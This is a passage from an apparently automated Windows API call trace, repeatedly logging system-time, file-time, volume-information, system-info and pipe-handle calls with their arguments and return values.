lpCreationTime=0x187164, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x187164*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.461] FileTimeToSystemTime (in: lpFileTime=0x187164, lpSystemTime=0x1870b0 | out: lpSystemTime=0x1870b0) returned 1 [0037.461] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.461] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.461] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.461] CreatePipe (in: hReadPipe=0x187088, hWritePipe=0x187070, lpPipeAttributes=0x187064, nSize=0x0 | out: hReadPipe=0x187088*=0x17c, hWritePipe=0x187070*=0x180) returned 1 [0037.461] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.461] CloseHandle (hObject=0x17c) returned 1 [0037.461] CloseHandle (hObject=0x180) returned 1 [0037.461] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x186818, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x186888, lpMaximumComponentLength=0x186778, lpFileSystemFlags=0x186780, lpFileSystemNameBuffer=0x186788, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x186888*=0x0, lpMaximumComponentLength=0x186778*=0x0, lpFileSystemFlags=0x186780*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.461] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1863b0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x186420, lpMaximumComponentLength=0x186310, lpFileSystemFlags=0x186318, lpFileSystemNameBuffer=0x186320, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x186420*=0x0, lpMaximumComponentLength=0x186310*=0x0, lpFileSystemFlags=0x186318*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.461] CreatePipe (in: hReadPipe=0x185fb8, hWritePipe=0x185fa0, lpPipeAttributes=0x185f94, nSize=0x0 | out: hReadPipe=0x185fb8*=0x180, hWritePipe=0x185fa0*=0x17c) returned 1 [0037.461] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.462] CloseHandle (hObject=0x180) returned 1 [0037.462] CloseHandle (hObject=0x17c) returned 1 [0037.462] CreatePipe (in: hReadPipe=0x1857b8, hWritePipe=0x1857a0, lpPipeAttributes=0x185794, nSize=0x0 | out: hReadPipe=0x1857b8*=0x17c, hWritePipe=0x1857a0*=0x180) returned 1 [0037.462] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.462] CloseHandle (hObject=0x17c) returned 1 [0037.462] CloseHandle (hObject=0x180) returned 1 [0037.462] GetSystemTime (in: lpSystemTime=0x185260 | out: lpSystemTime=0x185260*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.462] OpenFile (in: lpFileName="", lpReOpenBuff=0x185278, uStyle=0x0 | out: lpReOpenBuff=0x185278) returned 0xffffffff [0037.462] GetFileTime (in: hFile=0x0, lpCreationTime=0x185308, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x185308*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.462] FileTimeToSystemTime (in: lpFileTime=0x185308, lpSystemTime=0x185250 | out: lpSystemTime=0x185250) returned 1 [0037.462] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.462] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.462] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.462] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.462] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.462] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.462] CreatePipe (in: hReadPipe=0x184b58, hWritePipe=0x184b40, lpPipeAttributes=0x184b34, nSize=0x0 | out: hReadPipe=0x184b58*=0x180, hWritePipe=0x184b40*=0x17c) returned 1 [0037.462] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.462] CloseHandle (hObject=0x180) returned 1 [0037.462] CloseHandle (hObject=0x17c) returned 1 [0037.462] GetSystemTime (in: lpSystemTime=0x184600 | out: lpSystemTime=0x184600*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.462] OpenFile (in: lpFileName="", lpReOpenBuff=0x184618, uStyle=0x0 | out: lpReOpenBuff=0x184618) returned 0xffffffff [0037.462] GetFileTime (in: hFile=0x0, lpCreationTime=0x1846a8, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1846a8*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.462] FileTimeToSystemTime (in: lpFileTime=0x1846a8, lpSystemTime=0x1845f0 | out: lpSystemTime=0x1845f0) returned 1 [0037.462] GetSystemTime (in: lpSystemTime=0x1841f0 | out: lpSystemTime=0x1841f0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.463] OpenFile (in: lpFileName="", lpReOpenBuff=0x184208, uStyle=0x0 | out: lpReOpenBuff=0x184208) returned 0xffffffff [0037.463] GetFileTime (in: hFile=0x0, lpCreationTime=0x184294, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x184294*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.463] FileTimeToSystemTime (in: lpFileTime=0x184294, lpSystemTime=0x1841e0 | out: lpSystemTime=0x1841e0) returned 1 [0037.463] CreatePipe (in: hReadPipe=0x1841dc, hWritePipe=0x1841c4, lpPipeAttributes=0x1841b8, nSize=0x0 | out: hReadPipe=0x1841dc*=0x17c, hWritePipe=0x1841c4*=0x180) returned 1 [0037.463] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.463] CloseHandle (hObject=0x17c) returned 1 [0037.463] CloseHandle (hObject=0x180) returned 1 [0037.463] GetSystemMetrics (nIndex=19) returned 1 [0037.463] GetSystemMetrics (nIndex=23) returned 0 [0037.463] GetSystemInfo (in: lpSystemInfo=0x183ce4 | out: lpSystemInfo=0x183ce4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.463] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.463] GetStdHandle (nStdHandle=0xf55) returned 0xffffffff [0037.463] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.463] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x183c50, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x183cbc, lpMaximumComponentLength=0x183bb0, lpFileSystemFlags=0x183bb8, lpFileSystemNameBuffer=0x183bc0, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x183cbc*=0x0, lpMaximumComponentLength=0x183bb0*=0x0, lpFileSystemFlags=0x183bb8*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.463] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1837e8, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x183858, lpMaximumComponentLength=0x183748, lpFileSystemFlags=0x183750, lpFileSystemNameBuffer=0x183758, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x183858*=0x0, lpMaximumComponentLength=0x183748*=0x0, lpFileSystemFlags=0x183750*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.463] GetSystemMetrics (nIndex=19) returned 1 [0037.463] GetSystemMetrics (nIndex=23) returned 0 [0037.463] GetSystemInfo (in: lpSystemInfo=0x1836fc | out: lpSystemInfo=0x1836fc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.463] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.463] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.463] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.463] GetSystemTime (in: lpSystemTime=0x1832d8 | out: lpSystemTime=0x1832d8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.463] OpenFile (in: lpFileName="", lpReOpenBuff=0x1832f0, uStyle=0x0 | out: lpReOpenBuff=0x1832f0) returned 0xffffffff [0037.463] GetFileTime (in: hFile=0x0, lpCreationTime=0x18337c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x18337c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.463] FileTimeToSystemTime (in: lpFileTime=0x18337c, lpSystemTime=0x1832c8 | out: lpSystemTime=0x1832c8) returned 1 [0037.464] GetSystemTime (in: lpSystemTime=0x182ec8 | out: lpSystemTime=0x182ec8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.464] OpenFile (in: lpFileName="", lpReOpenBuff=0x182ee0, uStyle=0x0 | out: lpReOpenBuff=0x182ee0) returned 0xffffffff [0037.464] GetFileTime (in: hFile=0x0, lpCreationTime=0x182f6c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x182f6c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.464] FileTimeToSystemTime (in: lpFileTime=0x182f6c, lpSystemTime=0x182eb8 | out: lpSystemTime=0x182eb8) returned 1 [0037.464] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x182e48, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x182eb4, lpMaximumComponentLength=0x182da8, lpFileSystemFlags=0x182db0, lpFileSystemNameBuffer=0x182db8, nFileSystemNameSize=0xf55 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x182eb4*=0x9c354b42, lpMaximumComponentLength=0x182da8*=0xff, lpFileSystemFlags=0x182db0*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.464] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1829e0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x182a50, lpMaximumComponentLength=0x182940, lpFileSystemFlags=0x182948, lpFileSystemNameBuffer=0x182950, nFileSystemNameSize=0xf55 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x182a50*=0x9c354b42, lpMaximumComponentLength=0x182940*=0xff, lpFileSystemFlags=0x182948*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.464] GetSystemTime (in: lpSystemTime=0x182890 | out: lpSystemTime=0x182890*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.464] OpenFile (in: lpFileName="", lpReOpenBuff=0x1828a8, uStyle=0x0 | out: lpReOpenBuff=0x1828a8) returned 0xffffffff [0037.464] GetFileTime (in: hFile=0x0, lpCreationTime=0x182938, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x182938*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.464] FileTimeToSystemTime (in: lpFileTime=0x182938, lpSystemTime=0x182880 | out: lpSystemTime=0x182880) returned 1 [0037.464] GetSystemMetrics (nIndex=19) returned 1 [0037.464] GetSystemMetrics (nIndex=23) returned 0 [0037.464] GetSystemInfo (in: lpSystemInfo=0x182834 | out: lpSystemInfo=0x182834*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.464] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.464] GetStdHandle (nStdHandle=0x16ff) returned 0xffffffff [0037.464] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.464] CreatePipe (in: hReadPipe=0x18280c, hWritePipe=0x1827f4, lpPipeAttributes=0x1827e8, nSize=0x0 | out: hReadPipe=0x18280c*=0x180, hWritePipe=0x1827f4*=0x17c) returned 1 [0037.464] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.464] CloseHandle (hObject=0x180) returned 1 [0037.464] CloseHandle (hObject=0x17c) returned 1 [0037.464] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x181f98, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x182008, lpMaximumComponentLength=0x181ef8, lpFileSystemFlags=0x181f00, lpFileSystemNameBuffer=0x181f08, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x182008*=0x0, lpMaximumComponentLength=0x181ef8*=0x0, lpFileSystemFlags=0x181f00*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.465] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.465] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.465] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.465] GetSystemTime (in: lpSystemTime=0x181e28 | out: lpSystemTime=0x181e28*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.465] OpenFile (in: lpFileName="", lpReOpenBuff=0x181e40, uStyle=0x0 | out: lpReOpenBuff=0x181e40) returned 0xffffffff [0037.465] GetFileTime (in: hFile=0x0, lpCreationTime=0x181ecc, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x181ecc*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.465] FileTimeToSystemTime (in: lpFileTime=0x181ecc, lpSystemTime=0x181e18 | out: lpSystemTime=0x181e18) returned 1 [0037.465] GetSystemTime (in: lpSystemTime=0x181a18 | out: lpSystemTime=0x181a18*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.465] OpenFile (in: lpFileName="", lpReOpenBuff=0x181a30, uStyle=0x0 | out: lpReOpenBuff=0x181a30) returned 0xffffffff [0037.465] GetFileTime (in: hFile=0x0, lpCreationTime=0x181abc, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x181abc*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.465] FileTimeToSystemTime (in: lpFileTime=0x181abc, lpSystemTime=0x181a08 | out: lpSystemTime=0x181a08) returned 1 [0037.465] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.465] GetStdHandle (nStdHandle=0xf55) returned 0xffffffff [0037.465] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.465] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x181620, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x18168c, lpMaximumComponentLength=0x181580, lpFileSystemFlags=0x181588, lpFileSystemNameBuffer=0x181590, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x18168c*=0x0, lpMaximumComponentLength=0x181580*=0x0, lpFileSystemFlags=0x181588*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.465] GetSystemTime (in: lpSystemTime=0x1814d0 | out: lpSystemTime=0x1814d0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.465] OpenFile (in: lpFileName="", lpReOpenBuff=0x1814e8, uStyle=0x0 | out: lpReOpenBuff=0x1814e8) returned 0xffffffff [0037.465] GetFileTime (in: hFile=0x0, lpCreationTime=0x181578, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x181578*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.465] FileTimeToSystemTime (in: lpFileTime=0x181578, lpSystemTime=0x1814c0 | out: lpSystemTime=0x1814c0) returned 1 [0037.465] CreatePipe (in: hReadPipe=0x1814bc, hWritePipe=0x1814a4, lpPipeAttributes=0x181498, nSize=0x0 | out: hReadPipe=0x1814bc*=0x17c, hWritePipe=0x1814a4*=0x180) returned 1 [0037.465] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.465] CloseHandle (hObject=0x17c) returned 1 [0037.465] CloseHandle (hObject=0x180) returned 1 [0037.465] GetSystemMetrics (nIndex=19) returned 1 [0037.465] GetSystemMetrics (nIndex=23) returned 0 [0037.465] GetSystemInfo (in: lpSystemInfo=0x180fc4 | out: lpSystemInfo=0x180fc4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.465] GetSystemMetrics (nIndex=19) returned 1 [0037.465] GetSystemMetrics (nIndex=23) returned 0 [0037.465] GetSystemInfo (in: lpSystemInfo=0x180c20 | out: lpSystemInfo=0x180c20*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.466] GetSystemMetrics (nIndex=19) returned 1 [0037.466] GetSystemMetrics (nIndex=23) returned 0 [0037.466] GetSystemInfo (in: lpSystemInfo=0x180880 | out: lpSystemInfo=0x180880*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.466] CreatePipe (in: hReadPipe=0x18087c, hWritePipe=0x180864, lpPipeAttributes=0x180858, nSize=0x0 | out: hReadPipe=0x18087c*=0x180, hWritePipe=0x180864*=0x17c) returned 1 [0037.466] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.466] CloseHandle (hObject=0x180) returned 1 [0037.466] CloseHandle (hObject=0x17c) returned 1 [0037.466] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x180360, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x1803cc, lpMaximumComponentLength=0x1802c0, lpFileSystemFlags=0x1802c8, lpFileSystemNameBuffer=0x1802d0, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1803cc*=0x9c354b42, lpMaximumComponentLength=0x1802c0*=0xff, lpFileSystemFlags=0x1802c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.466] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.466] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.466] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.466] GetSystemMetrics (nIndex=19) returned 1 [0037.466] GetSystemMetrics (nIndex=23) returned 0 [0037.466] GetSystemInfo (in: lpSystemInfo=0x17fba8 | out: lpSystemInfo=0x17fba8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.466] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.466] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.466] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.466] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.466] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.466] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.466] GetSystemTime (in: lpSystemTime=0x17f758 | out: lpSystemTime=0x17f758*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.466] OpenFile (in: lpFileName="", lpReOpenBuff=0x17f770, uStyle=0x0 | out: lpReOpenBuff=0x17f770) returned 0xffffffff [0037.466] GetFileTime (in: hFile=0x0, lpCreationTime=0x17f800, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17f800*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.466] FileTimeToSystemTime (in: lpFileTime=0x17f800, lpSystemTime=0x17f748 | out: lpSystemTime=0x17f748) returned 1 [0037.466] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17f380, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17f3f0, lpMaximumComponentLength=0x17f2e0, lpFileSystemFlags=0x17f2e8, lpFileSystemNameBuffer=0x17f2f0, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17f3f0*=0x9c354b42, lpMaximumComponentLength=0x17f2e0*=0xff, lpFileSystemFlags=0x17f2e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.467] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.467] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.467] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.467] CreatePipe (in: hReadPipe=0x17ef64, hWritePipe=0x17ef4c, lpPipeAttributes=0x17ef40, nSize=0x0 | out: hReadPipe=0x17ef64*=0x17c, hWritePipe=0x17ef4c*=0x180) returned 1 [0037.467] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.467] CloseHandle (hObject=0x17c) returned 1 [0037.467] CloseHandle (hObject=0x180) returned 1 [0037.467] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.467] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.467] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.467] GetSystemTime (in: lpSystemTime=0x17e690 | out: lpSystemTime=0x17e690*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.467] OpenFile (in: lpFileName="", lpReOpenBuff=0x17e6a8, uStyle=0x0 | out: lpReOpenBuff=0x17e6a8) returned 0xffffffff [0037.467] GetFileTime (in: hFile=0x0, lpCreationTime=0x17e738, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17e738*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.467] FileTimeToSystemTime (in: lpFileTime=0x17e738, lpSystemTime=0x17e680 | out: lpSystemTime=0x17e680) returned 1 [0037.467] GetSystemMetrics (nIndex=19) returned 1 [0037.467] GetSystemMetrics (nIndex=23) returned 0 [0037.467] GetSystemInfo (in: lpSystemInfo=0x17e634 | out: lpSystemInfo=0x17e634*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.467] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17e268, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17e2d8, lpMaximumComponentLength=0x17e1c8, lpFileSystemFlags=0x17e1d0, lpFileSystemNameBuffer=0x17e1d8, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17e2d8*=0x9c354b42, lpMaximumComponentLength=0x17e1c8*=0xff, lpFileSystemFlags=0x17e1d0*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.467] GetSystemTime (in: lpSystemTime=0x17e118 | out: lpSystemTime=0x17e118*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.467] OpenFile (in: lpFileName="", lpReOpenBuff=0x17e130, uStyle=0x0 | out: lpReOpenBuff=0x17e130) returned 0xffffffff [0037.467] GetFileTime (in: hFile=0x0, lpCreationTime=0x17e1c0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17e1c0*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.467] FileTimeToSystemTime (in: lpFileTime=0x17e1c0, lpSystemTime=0x17e108 | out: lpSystemTime=0x17e108) returned 1 [0037.467] GetSystemMetrics (nIndex=19) returned 1 [0037.467] GetSystemMetrics (nIndex=23) returned 0 [0037.467] GetSystemInfo (in: lpSystemInfo=0x17e0bc | out: lpSystemInfo=0x17e0bc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.467] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.467] GetStdHandle (nStdHandle=0xf55) returned 0xffffffff [0037.467] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.467] GetSystemMetrics (nIndex=19) returned 1 [0037.467] GetSystemMetrics (nIndex=23) returned 0 [0037.467] GetSystemInfo (in: lpSystemInfo=0x17dcf8 | out: lpSystemInfo=0x17dcf8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.468] GetSystemMetrics (nIndex=19) returned 1 [0037.468] GetSystemMetrics (nIndex=23) returned 0 [0037.468] GetSystemInfo (in: lpSystemInfo=0x17d958 | out: lpSystemInfo=0x17d958*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.468] GetSystemTime (in: lpSystemTime=0x17d8a8 | out: lpSystemTime=0x17d8a8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.468] OpenFile (in: lpFileName="", 